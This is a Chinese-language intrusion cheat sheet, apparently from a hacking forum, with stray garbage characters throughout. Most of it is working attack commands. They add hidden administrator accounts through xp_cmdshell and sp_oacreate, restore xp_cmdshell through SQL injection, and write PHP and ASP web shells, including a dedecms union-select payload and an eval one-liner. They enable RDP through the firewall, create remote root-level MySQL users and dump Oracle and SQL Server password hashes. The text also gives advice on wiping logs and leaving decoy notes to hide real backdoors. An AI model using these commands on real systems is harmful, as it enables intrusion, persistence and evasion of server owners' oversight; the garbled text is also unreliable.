6 U) r$ I8 w; u+ v3 L7 k; S- I1.net user administrator /passwordreq:no& h: V# v& K2 f
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
$ S4 Z- Y# X6 I( {' k4 `2.比较巧妙的建克隆号的步骤
. K# P+ F c- W) \, V" p, H5 Y) T先建一个user的用户- p1 y v; k# N( K# s1 P
然后导出注册表。然后在计算机管理里删掉
+ W3 I z" W8 |& F" k- @4 v在导入,在添加为管理员组
! t! Y4 h4 z' a0 Q, k5 a5 I3.查radmin密码1 F# ~! L' |1 Y' Z2 ]: y
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg0 G5 \9 k; H; K+ B3 n+ X. R
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
) U1 \; o0 S# _! y8 c# t建立一个"services.exe"的项
7 G6 Y7 F% A; I再在其下面建立(字符串值)
# {* r0 M) Z" X& w- y, H键值为mu ma的全路径5 o- }3 s0 p. v7 O
5.runas /user:guest cmd8 P" c, k6 Z' r; x0 w
测试用户权限!8 g5 W% F* d. a2 a4 L) m
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
) k1 D3 ~, N0 }1 H! \7.入侵后漏洞修补、痕迹清理,后门置放:
0 E- `8 w, x z0 V7 q+ m7 [基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门1 Z- ~) t& X9 X
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
! Z. i1 \: P6 Z: d6 i3 ?' X. b% s7 _7 [6 P7 e: [1 Y5 O1 A, |
for example
! @* K& e+ X* l% z
$ X+ w6 X; G# ] N' F: x" Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'* g$ p- Z4 d& g9 O v! D: E
+ Z8 v1 j4 R3 O- _( vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'$ E- p3 {9 g+ ]" \% u
% l! O. U& q: q1 l# C- j/ o
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
) _6 w' V$ L% O7 m" a/ o如果要启用的话就必须把他加到高级用户模式
4 x* X5 J+ F2 k" m可以直接在注入点那里直接注入1 h" Z2 D8 Y8 J' G
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--6 Y- R% z6 T/ T
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--9 U3 a5 K, Q' P! p! D2 |4 T
或者0 v7 H# l: r- v# r" S
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
( k4 S/ A ~1 w0 s' D" ?; n5 X来恢复cmdshell。
2 a+ N( e5 ?+ I
" ?/ t% f8 o+ l分析器
( B$ ~5 [ R0 |( h% O. tEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--% u9 t- u, i$ Z! d& a* t3 }4 w% T
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
8 t; z0 K. V* J" v/ x- l, F10.xp_cmdshell新的恢复办法# d, X" D3 t2 s' I; Z. z; j
xp_cmdshell新的恢复办法
$ w8 W! @8 d4 z6 M3 ?8 k) t扩展储存过程被删除以后可以有很简单的办法恢复:; W- V$ d5 S" E' s
删除
, K; Z% K# }0 C% ^1 A0 a! \drop procedure sp_addextendedproc0 v. Y/ J/ D; q$ v" S
drop procedure sp_oacreate! ?+ w& t. `9 g& K. \
exec sp_dropextendedproc 'xp_cmdshell'
" v6 {2 R1 m$ e* @' @; [4 C
( p& p+ B9 w/ y4 X恢复
% E+ h1 Z5 r4 x+ X/ {dbcc addextendedproc ("sp_oacreate","odsole70.dll")
& ^/ v \! Q; k* I6 N8 W1 rdbcc addextendedproc ("xp_cmdshell","xplog70.dll")6 s! I M- p; Z, V, b% G6 m
" ]4 {+ `$ p' s d/ S这样可以直接恢复,不用去管sp_addextendedproc是不是存在% O: R* N# ^% O- \; T4 L! U
3 u9 {, |7 b9 R8 R I S" A
-----------------------------# V" ^7 m9 A; M3 A3 T4 k! e1 X
% x. {2 T2 k; e; C1 Y; w. n
删除扩展存储过过程xp_cmdshell的语句:6 H; ~+ Z: o$ y: c
exec sp_dropextendedproc 'xp_cmdshell' N8 e* \* N* H2 d( C
& U4 \0 G! X i4 r y; p: ]恢复cmdshell的sql语句6 O- Z7 V. \" p" ]5 P5 r3 {: ]. Y+ K
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'2 Y# }4 C- p. p
1 z; D) Z! A5 P
0 H. S% x3 A- K8 n$ j* l' G0 ^# ^2 {
开启cmdshell的sql语句- x" {# H+ x9 m
$ o2 ?9 t, j6 z
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll': G" n8 ? N& d
! i9 ]. X j0 R判断存储扩展是否存在/ @2 f4 k5 H) ]0 p' J0 C# F |
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'' w4 H4 R6 r" l. g3 D/ l
返回结果为1就ok
& ~$ Z! s& ?, f: o7 r8 D% Z% `
# A2 ~' `. Z0 O# a( K恢复xp_cmdshell
6 D5 b- L* ^ o' k* l9 ^exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'9 ], }1 C3 B0 \+ M
返回结果为1就ok
5 H7 a) x2 C _ y( M* X' A8 F! F0 X' m" L3 i
否则上传xplog7.0.dll- s% h0 U9 e( R6 i X& b( X
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
+ K+ U5 G% k* {
( W( S1 [. Q5 O堵上cmdshell的sql语句+ i5 P1 U% m) A
sp_dropextendedproc "xp_cmdshel
1 m1 k- q; Q, x-------------------------
9 K: K, j+ s. c' P( _' K) P清除3389的登录记录用一条系统自带的命令:: P y( R3 ^6 O# J5 m! E" [
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
# g+ r! x- f4 M! ~% ~. c" _8 G5 m
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
1 O! \, H' f/ t- \在 mysql里查看当前用户的权限
: r; O; J0 P( r/ q" R! N( D; i. \show grants for
& K4 [/ e. o4 D) R
- A; ]) }+ a; {' ~! W+ K0 I' a9 ]以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
7 R7 l/ A5 T+ q5 m: `- s7 T/ I9 h1 y
/ b% D) {) Q5 C* ^& {) f2 Z! J8 m& q( Q2 z! a# U" I6 _3 P
Create USER 'itpro'@'%' IDENTIFIED BY '123';
1 f# x( q0 y$ {) z- f9 i" Y3 z, L7 l- j
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
4 c$ ]& }9 e& h+ F
9 M' f' B- R0 n9 u9 L8 f( UMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
8 m7 R) [: j# D+ U1 ]& J/ R
. N' h' R& K& Y, T+ YMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
6 Q. s- P+ i# R1 P0 z
1 w2 r# }% ` Z8 X! M$ i搞完事记得删除脚印哟。* x" n% O- S8 u+ ^) t. \
+ Y( p3 C2 C( U; _! F jDrop USER 'itpro'@'%';
9 g. z% V* {/ @! w* ?/ ?7 M8 z/ I4 H, Q- A( W J0 J* Z/ I
Drop DATABASE IF EXISTS `itpro` ;5 A# V8 d. x5 S" U
, j4 n0 ]/ D: K4 b5 q+ X' s3 t
当前用户获取system权限
0 c* h1 i& k' j+ Q* ~sc Create SuperCMD binPath= "cmd /K start" type= own type= interact t1 J. b% A! I; E$ o
sc start SuperCMD$ S2 o& E; E$ v! B
程序代码
; w- V( k# a% z# x( ] }. ~& H<SCRIPT LANGUAGE="VBScript">
4 t+ q0 {7 u2 X! h/ P$ h3 Z/ f4 gset wsnetwork=CreateObject("WSCRIPT.NETWORK")- V1 |" a% m# A) N# A+ b' X0 Z
os="WinNT://"&wsnetwork.ComputerName
% w7 `9 I7 U: b' NSet ob=GetObject(os)3 V0 q; f! H6 Y* s9 _% `; @( E" E
Set oe=GetObject(os&"/Administrators,group")& C9 |! F* K7 t& K
Set od=ob.Create("user","nosec")
0 d" L& Z) {/ x. Z2 o% Wod.SetPassword "123456abc!@#"
& G- S8 v; `; q/ x yod.SetInfo4 K3 V, `/ R3 P- ?* Z6 X$ j: E+ X
Set of=GetObject(os&"/nosec",user)- W& F6 [0 X- P& S0 w
oe.add os&"/nosec": b( y$ @6 i; I; D6 c
</Script>+ C) Y# Q& n0 n: c$ s
<script language=javascript>window.close();</script>
9 n' u8 {! [" R0 j: g& W- w& Q5 _) R* Y, ?
8 p$ X2 K5 K8 @+ T) \+ i% B& x
1 [7 G- b' ?$ D# b
- E. Q( L. y- G) i1 j突破验证码限制入后台拿shell
. L# }+ t3 ^- K6 E' l, Z程序代码, C6 E6 d8 a9 z3 F% d/ g+ S' v! a
REGEDIT4
- Y4 M" _) @3 p( ~[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
4 O- L5 U0 S# x4 j8 u8 n"BlockXBM"=dword:00000000
# m/ v, z, l" g( T: k; ~% k$ j3 J
保存为code.reg,导入注册表,重器IE8 B0 ?1 Y. H- K0 ]+ y
就可以了
) ^! A8 y$ H8 A i9 e5 {union写马
" u. B# C9 M+ ^程序代码! I2 w- v5 E7 R' v% D6 [
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
8 H `1 n1 q3 m Q, w: ~* F
1 ?/ s! S; t9 @) K应用在dedecms注射漏洞上,无后台写马
5 v- I" q P0 g8 O) j C0 xdedecms后台,无文件管理器,没有outfile权限的时候
) J2 l% x) t$ e2 H. F( B4 q在插件管理-病毒扫描里2 R- B9 }1 @$ ^ a2 v
写一句话进include/config_hand.php里% R0 j& z" L3 E& @2 \
程序代码
Z7 v& D1 }3 U+ n' Q8 Q>';?><?php @eval($_POST[cmd]);?>5 {2 b$ c9 B# S$ G) X% r+ b6 R, P
# r* b; w9 H4 t; A) v
1 C5 f* y9 r8 q如上格式
4 @% j+ S+ i+ @. m* y; H4 L2 V! W5 G4 c3 U* t0 I
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
* u, {! q& e3 R/ V/ \& F6 M程序代码9 N' \* N4 r$ W0 R
select username,password from dba_users;
# K' n* q2 k& _
7 M3 ]- C" G. G9 }8 @+ l! A2 f$ k; L8 I
mysql远程连接用户, e2 v4 r$ P5 O% @; d3 b7 w
程序代码6 ~1 ~/ h$ {7 g3 M3 t+ G
9 M) d( _, J4 P: o
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme'; X4 x, V, i( F1 d D$ C
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
6 i$ y# u q+ l0 f* a e* rMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
# f+ ~# \" }6 H# P6 fMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;+ }1 d o$ ^7 e& v
+ u% g; G& a3 j+ G
. x2 A9 f9 r, M) T4 W( J8 x8 z& `
+ W. e" S% S! P( F9 n
/ b( B- M! q2 S# T* `) p
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
5 u: o7 B8 W: z1 n3 g3 I; l: V+ N1 T% R3 p; S0 ] S6 v
1.查询终端端口
+ r5 K* b# C; a9 `3 u5 j- J2 |5 X* l: j
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber% w2 v& l( A8 l/ M# L) y( H4 ~
% \9 {$ A6 J- R3 v6 ~+ |$ ?. ` Y& Q) j
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
& G$ x2 ], b7 _4 U0 @" @( t) mtype tsp.reg$ E) j* J0 [. n! {1 o
1 r" B$ U0 k# \( _% T: l9 ?$ [
2.开启XP&2003终端服务) ^9 ^4 m, A V }0 f
( V9 V" d& `& y" \4 D
& X/ }# @( W. j; h. I
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
+ q" n8 M. ? ~+ b. y' Q* H
) `1 O. j, a$ K5 y
: ^8 A+ o x5 D! \7 V. HREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
' w0 A9 Z: h- _8 g" o
/ S( Z3 }4 A! \: B3.更改终端端口为20008(0x4E28)4 i5 F0 B% L) Y
' L4 O0 d; A6 g5 _: m: e, aREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
: V! _, b- c9 k8 k' I
, y5 D1 q& }0 K* Y2 `REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f2 C- U0 R9 p- _2 u2 h7 k( C5 ~
- a( ~" @! e, ?
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制- P4 c' ~! I! n/ S9 r6 o
% |* m. H; D; d7 |5 zREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
( Q( j, }: w' ^% U+ [- z2 l1 J( m6 j4 V4 z4 h
' h+ L1 G" V2 w' d X. K6 Q- @3 S
5.开启Win2000的终端,端口为3389(需重启)% i$ \* S4 G: ^4 C: T f, u* o
t4 R O s7 ^1 W$ Z8 ]4 Y
echo Windows Registry Editor Version 5.00 >2000.reg
1 T& x8 \$ g! D' ]7 Decho. >>2000.reg, D: e/ M% }5 T4 _
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
2 z; z p4 A% J/ `8 u9 z0 iecho "Enabled"="0" >>2000.reg ) ?# E( Y6 z* ~# L% Q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
/ T. x" c4 f4 a! r$ eecho "ShutdownWithoutLogon"="0" >>2000.reg . \( M. E# s8 Y- t) ?, N2 E
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg ( P: Z6 e) S) J
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
# } i- _9 S F, W7 x/ ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
$ R8 q: h% V Z* s1 b4 qecho "TSEnabled"=dword:00000001 >>2000.reg
! m5 V8 c5 K) L6 oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
: v( v0 U7 d7 z5 k! Eecho "Start"=dword:00000002 >>2000.reg
' J0 b( t. _! B8 S7 Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
: J8 q" t6 |4 q; Aecho "Start"=dword:00000002 >>2000.reg
# k3 i1 @1 R" Z/ fecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 9 r @& x- P5 D- a/ m
echo "Hotkey"="1" >>2000.reg
* U& ^( G! l* `+ z- {4 z( A9 necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
3 b" g0 [4 \5 U3 E6 T' I" T2 z1 aecho "ortNumber"=dword:00000D3D >>2000.reg 1 v% z: D# t8 \, f' O6 @& V4 K y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 5 m! v8 f9 Q( G
echo "ortNumber"=dword:00000D3D >>2000.reg5 E0 J0 K3 M2 ^: S. k, a6 o& u
* o. [2 {, e& v& ~3 @" d( t: r
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)1 a( O7 D& x, V# j* W( G
$ B- P( W1 T% w( u+ ?@ECHO OFF & cd/d %temp% & echo [version] > restart.inf7 ~1 L! R k6 Z3 Y2 y
(set inf=InstallHinfSection DefaultInstall)
! y: t3 I2 y* a$ Lecho signature=$chicago$ >> restart.inf
5 E" T) l* e+ Y6 j- J1 n2 n8 ]echo [defaultinstall] >> restart.inf7 \. O3 ]4 J: p+ W% c1 }$ v) J
rundll32 setupapi,%inf% 1 %temp%\restart.inf
# i0 \& r$ O) u! n8 i2 _# P v5 {) ^; P( S, k9 c" s! t) q, J/ A
2 {3 e4 ^7 n* I) Y6 ^% J; V6 P
7.禁用TCP/IP端口筛选 (需重启)
9 V) k E- P$ L: y4 r% e+ x4 Y- u2 T* L( k+ U* \
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
) V6 T/ `% ?* {8 ^! d) ]- \2 L( K6 X& y8 X% u
8.终端超出最大连接数时可用下面的命令来连接& \* g5 k( a- t) Y% D2 Z
: O/ Q. U! E' o R
mstsc /v:ip:3389 /console2 a* s" s+ m5 L' c4 K+ A' e \
1 u- c5 E9 z4 R) |" y. c( t, L
9.调整NTFS分区权限
; n9 r: I( `5 L
# [' y- P: f' Ycacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)! S0 k" x/ X% X% L4 M! o/ a8 d9 Y& Y
, ~/ [9 s: v; a( a. s
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
* c+ w8 ^( |3 V# E
) u: {$ n4 G0 r, N+ [0 d( k& N------------------------------------------------------% G/ f- f9 ~$ B0 U, v" t
3389.vbs
: l2 w: n; b. n/ v+ ~On Error Resume Next. E) J$ ^ i3 d" G4 G7 Y
const HKEY_LOCAL_MACHINE = &H80000002
8 B. m7 a" Y/ h( ?2 \strComputer = "."
7 B( m( C* P1 F! E8 BSet StdOut = WScript.StdOut8 a8 K( S9 n, T9 Y/ M7 U
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_& N$ U0 Z0 s, a: G: N0 X
strComputer & "\root\default:StdRegProv")% g% J* B7 A4 C% w8 ]! [& }
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
9 A5 f5 I8 x# [ {* Z# x" |: X1 koreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath5 J+ G0 L% v$ ?6 g+ y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
" T$ x4 H2 P, ]0 i) Goreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath$ `& h5 M9 ]7 A; l% w+ B) t
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"' k0 b$ z8 C) E( q
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"$ }+ S0 E6 Q5 N8 _' K/ D
strValueName = "fDenyTSConnections"
3 M2 L) w# d5 R9 u' fdwValue = 0- J/ e7 K3 M! ~- \# I4 b# E( W
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# D+ m7 g( u. U/ {8 N MstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"2 X1 L7 E( j" |3 r1 ^2 {
strValueName = "ortNumber"/ t( }) S4 c) x+ I6 g% Z
dwValue = 3389
* M8 C5 }6 e9 L) g5 ^oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue$ J- W3 @7 Z$ C
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp": J# s) G' C8 _) l
strValueName = "ortNumber"
6 j+ r5 \* I8 rdwValue = 3389
/ \( A- Z0 S* Z* A+ f- {3 ?oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue) @* o3 o" d0 R9 p. B q! p, z
Set R = CreateObject("WScript.Shell") ! g) K( G: I' S$ u
R.run("Shutdown.exe -f -r -t 0") 7 Q. ]/ `- }. j) \. ~0 ?- @' t
0 {4 C- J+ }* O/ z$ W
删除awgina.dll的注册表键值
3 u- }5 E) |7 W9 q' ]程序代码
% n; ~! v2 ?4 y2 J" I% v
% z8 m) g, r8 I% s2 [9 K$ Mreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f$ L/ `5 N# O0 l9 }2 t
+ m$ y' J9 ?& [% ^- p/ H! r$ G. X: `
; ]* [7 G/ _ g# |4 l5 u' t0 E J( b( f( G1 V
程序代码$ i; ^) u% b4 M3 d7 f) F/ I
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash+ N3 G7 k& f" K! `
6 c" m* i) N$ N- z- ~ D设置为1,关闭LM Hash
. f0 f( N1 o& Y) b. \& R8 B3 [' D. {/ G; y5 H$ W/ g
数据库安全:入侵Oracle数据库常用操作命令- l2 H* ]% ^# p W, R
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
( @- h2 R9 b8 r0 v0 N1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
/ k4 ^/ V! I: t' m, p6 I7 K' R! X2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;* f5 G o/ c' _; ]) n
3、SQL>connect / as sysdba ;(as sysoper)或
, V6 E9 A( Q* Q% z! ^: iconnect internal/oracle AS SYSDBA ;(scott/tiger)9 [) d+ G4 {8 N/ J0 V
conn sys/change_on_install as sysdba;
* ?! U) T: j3 Y0 F7 L- J& U4、SQL>startup; 启动数据库实例- |9 u/ b5 x5 e$ e1 J, O' A4 W% q! x
5、查看当前的所有数据库: select * from v$database;
( Q6 ^1 O+ |# Z( g' y$ D# e6 _1 \" C* Kselect name from v$database;
4 ~/ i f9 @ w. A% K6、desc v$databases; 查看数据库结构字段
/ Q! U2 k. T: s4 B7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
7 }% e s( K. S& l6 ?SQL>select * from V_$PWFILE_USERS;
5 q F$ Z* K' \0 P7 \Show user;查看当前数据库连接用户7 y5 O1 v+ B0 m6 v+ C, [% x
8、进入test数据库:database test;
P" y5 `# {8 q9、查看所有的数据库实例:select * from v$instance;
. ]" S& I5 K. L: l1 ~0 G如:ora9i' }: t* {" m2 o% f3 j" \8 Q# N) \
10、查看当前库的所有数据表:
2 k. U9 i( L$ B# w j7 t8 I1 GSQL> select TABLE_NAME from all_tables;1 Q" u, U% l3 |0 {2 C g. o: |
select * from all_tables;( G: p8 v& k0 |; ?1 r
SQL> select table_name from all_tables where table_name like '%u%';& U1 K+ R L' ?1 d* R2 q8 w# f
TABLE_NAME
+ ~0 n; J; q: |: ]------------------------------
( C* m. U* Y$ F_default_auditing_options_
/ G" A& d2 [- u% I# N11、查看表结构:desc all_tables;
3 X# U" p. ?8 y( N12、显示CQI.T_BBS_XUSER的所有字段结构:5 i3 y1 X8 N P) [* }! K
desc CQI.T_BBS_XUSER;" A# E6 O# n9 Y+ @; o2 W( b
13、获得CQI.T_BBS_XUSER表中的记录: }# V$ X5 L! L
select * from CQI.T_BBS_XUSER;! @& {+ z. `9 F/ b/ m9 E. ^
14、增加数据库用户:(test11/test)/ `% N* x. A, j5 R" x0 V; ?1 S
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
5 l/ P; a# B2 e' k15、用户授权:3 K' j6 x; h; j
grant connect,resource,dba to test11;
) F0 k* Q+ T( G1 S/ ~grant sysdba to test11;
' e$ i! i/ e, {: w" vcommit;& k" J( \0 N. } b; h' x- X
16、更改数据库用户的密码:(将sys与system的密码改为test.)/ S M! q: D& B' ]2 o8 T
alter user sys indentified by test;
: K$ F% u {! Z8 q' aalter user system indentified by test;# c% ~# T8 z3 T. w w
$ b* H0 |( B+ G. ^
applicationContext-util.xml
( M5 f6 g! n; Q. yapplicationContext.xml
% K( |- g) y! z* L1 q+ N; S. Ystruts-config.xml
! I, Z8 N, u; @ A" \$ C: m; Rweb.xml% t9 r4 o9 C" b: V/ X
server.xml# C( G1 a9 y* o8 X/ V5 X$ {3 d
tomcat-users.xml
* G" A2 [. X6 e! Q9 _$ ehibernate.cfg.xml# K# C5 K2 W+ X: }9 W/ L% a, \; B
database_pool_config.xml; a+ d- Q! }& B5 a2 T4 G
* t1 a3 h' K( @, H
4 Y/ c" C) s% h i1 {\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
; G3 X) x; E! g0 u9 p' f\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
/ h" R( H/ f8 S+ S" b\WEB-INF\struts-config.xml 文件目录结构: J- i8 o8 W! h
3 o( ^) g# W9 ]9 {spring.properties 里边包含hibernate.cfg.xml的名称. S' V9 w3 s. T$ o* P/ s) M
+ }: Y3 D8 A8 [9 k
' S$ l& T; a% j: Y6 t/ DC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
# G6 R8 p+ }4 Y7 G# I. `, e* {. j) u4 R7 B" G2 m- ^
如果都找不到 那就看看class文件吧。。
% t G7 E% H* P9 m
1 [0 [2 C# W8 F# S$ Q! T测试1:
8 T ]- V5 V2 cSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t11 h* `( E1 V# b% }1 s; L, n/ u
: W( r( }% c# p" `9 G' P+ n" M7 T$ M
测试2:. }# K" l8 l) p$ P9 V. D" p
1 ?6 B* E& b8 U8 c( G& l" Ycreate table dirs(paths varchar(100),paths1 varchar(100), id int)# Q! h( T/ _3 Q
. a) p8 x% {+ ~
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--& P# Z* u3 r0 K5 f
$ n* G. i3 ^& ZSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
3 F! O- ]6 t6 \3 z2 V( `& K" b4 \ \! E6 }' t( }
查看虚拟机中的共享文件:
: u* t$ V* P; n+ V3 D" N+ A1 ?6 b在虚拟机中的cmd中执行( l4 ?2 L! B) m! s( e% ?' n
\\.host\Shared Folders- u& A2 ?; `' G1 @" [0 \4 D% r
0 T9 ?1 H: ^% {7 t, Q& k$ l6 ncmdshell下找终端的技巧
) ?3 w/ r7 S! h$ s, o7 A, z找终端: - b* ?' h5 {# J# ]
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
) i; J9 j! F6 {7 M" f9 ~. p 而终端所对应的服务名为:TermService
- \3 e- G P) R$ n! |* e* T- r' S第二步:用netstat -ano命令,列出所有端口对应的PID值! 7 r& M1 J0 ^6 l
找到PID值所对应的端口% w5 N& ]' h$ y
) v0 t* z6 `- O+ |7 b9 g' Z$ D查询sql server 2005中的密码hash( {- _, D( U J, U+ a+ b
SELECT password_hash FROM sys.sql_logins where name='sa'
# R% }" A+ ^7 x* OSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
" k* m8 i9 P/ maccess中导出shell
: z+ J0 v2 \+ n- j3 i. K+ i" C
6 |2 l; K7 m' ^- C中文版本操作系统中针对mysql添加用户完整代码:
) }3 {7 }' `* h' |3 }
' m* Z* {! z% j; ^# O/ }* d" _- Quse test;
/ `- g- C ~1 {create table a (cmd text);
